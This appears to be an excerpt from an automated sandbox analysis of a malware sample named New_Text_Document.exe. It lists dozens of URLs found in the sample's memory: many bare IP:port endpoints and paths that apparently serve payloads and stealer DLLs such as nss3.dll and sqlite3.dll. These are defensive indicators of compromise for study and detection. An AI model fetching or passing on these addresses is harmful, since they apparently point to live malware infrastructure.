                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.68.161.157:4018/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.84.226.16:47432/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.84.232.240:50881/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.167/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.103.252.65/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.122.213.250:34654/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.103.32:19834/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.201.177.164:12687/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.46.183:20804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74//CRYPS/Q9/PeF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74//CRYPS/Q9/dll3f3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/CRYPS/QWERS/MASTERXLS/PeF3New.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/CRYPS/QWERS/MASTERXLS/dll.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/CRYPS/QWERS/NEW24/Pe03.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/CRYPS/QWERS/NEW24/dllF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/RX/F3Pe.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/RX/F3dll.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/RX/nuevadll.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/RXWER/dllf3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/RXWER/fePe.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/ZXC/ZAS/PeF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/GREEN/ZXC/ZAS/dllf3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Arhvn.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Arrw.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Async.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/L8.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Lx6.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/NJ.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Nx.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Q1.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Q7.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/R.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Rm.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/Rmz.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/SP/MC/BANDI99.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/SP/Q2s.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/SP/nxj.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/T3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/ZX2.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/njx.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/njz.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.50.74/new/mofers/ny1.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.224.98.57:38659/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.241.37.121:42466/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.244.253.103:36940/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.122.87:27744/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.188.72:64496/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.213.28:61542/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.8.200:13726/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.98.142.136:36896/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.162.107.172:47159/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.147.103:30468/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.68.142:45790/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.198.21:18352/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.26.84.52:42784/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.81.131.98:52370/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.118.181.115:23456/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.118.183.239:58305/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.123.49.138:11843/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.148.242.198:65002/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.157.73:46916/.i
